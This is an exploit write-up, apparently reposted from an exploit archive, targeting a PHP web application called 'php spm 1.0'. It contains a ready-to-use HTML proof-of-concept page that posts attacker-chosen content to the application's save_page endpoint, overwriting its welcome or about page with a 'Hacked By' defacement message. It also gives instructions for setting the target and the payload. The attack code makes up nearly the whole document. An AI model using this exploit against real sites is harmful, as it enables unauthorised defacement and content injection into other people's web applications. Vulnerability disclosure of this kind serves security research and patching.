Share
## https://sploitus.com/exploit?id=PACKETSTORM:181829
=============================================================================================================================================  
| # Title : php spm 1.0 WYSIWYG code injection vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php .   
  
[+] Line 86 : Set your Target.  
  
[+] Line 27 : set your payload. <textarea name="page[welcome] ===> You can type welcome or about.  
  
[+] save payload as poc.html  
  
[+] payload :   
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Welcome Page Editor</title>  
<script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>  
</head>  
<body>  
<main id="main" class="main">  
<div class="pagetitle">  
<h1>Welcome Page</h1>  
<nav>  
<ol class="breadcrumb">  
  
<li class="breadcrumb-item active">Welcome Page</li>  
</ol>  
</nav>  
</div>  
  
<div id="msg-container"></div>  
  
<div class="card rounded-0">  
<div class="card-body rounded-0 pt-4">  
<div class="container-fluid">  
<form id="page-form">  
<textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>  
</form>  
</div>  
</div>  
<div class="card-footer">  
<div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">  
<button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>  
</div>  
</div>  
</div>  
  
<div id="loader" style="display:none;">Loading...</div>  
<div id="toast"></div>  
  
<script>  
// Initialize TinyMCE  
tinymce.init({  
selector: 'textarea.tinymce-editor',  
height: 300,  
menubar: false,  
plugins: [  
'advlist autolink lists link image charmap print preview anchor',  
'searchreplace visualblocks code fullscreen',  
'insertdatetime media table paste code help wordcount'  
],  
toolbar: 'undo redo | formatselect | bold italic backcolor | ' +  
'alignleft aligncenter alignright alignjustify | ' +  
'bullist numlist outdent indent | removeformat | help'  
});  
  
// Loader functions  
function start_loader() {  
document.getElementById('loader').style.display = 'block';  
}  
  
function end_loader() {  
document.getElementById('loader').style.display = 'none';  
}  
  
// Toast function  
function showMessage(message, type) {  
const messageDiv = document.getElementById('toast');  
messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;  
setTimeout(() => {  
messageDiv.innerHTML = '';  
}, 3000);  
}  
  
// Form submit event listener  
document.getElementById('page-form').addEventListener('submit', function(e) {  
e.preventDefault(); // Prevent page reload  
  
// Start loader  
start_loader();  
  
const formData = new FormData(this); // Get form data  
const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object  
  
// Set up request  
xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);  
  
// Handle response  
xhr.onreadystatechange = function() {  
if (xhr.readyState === XMLHttpRequest.DONE) {  
end_loader();  
if (xhr.status === 200) {  
const response = JSON.parse(xhr.responseText);  
if (response.status === 'success') {  
showMessage('Page updated successfully!', 'success');  
location.reload(); // Reload the page if successful  
} else if (response.status === 'failed' && response.msg) {  
showMessage(response.msg, 'error');  
} else {  
showMessage('An unknown error occurred.', 'error');  
}  
} else {  
showMessage('Error: ' + xhr.statusText, 'error');  
}  
}  
};  
  
// Send the request  
xhr.send(formData);  
});  
</script>  
</main>  
</body>  
</html>  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================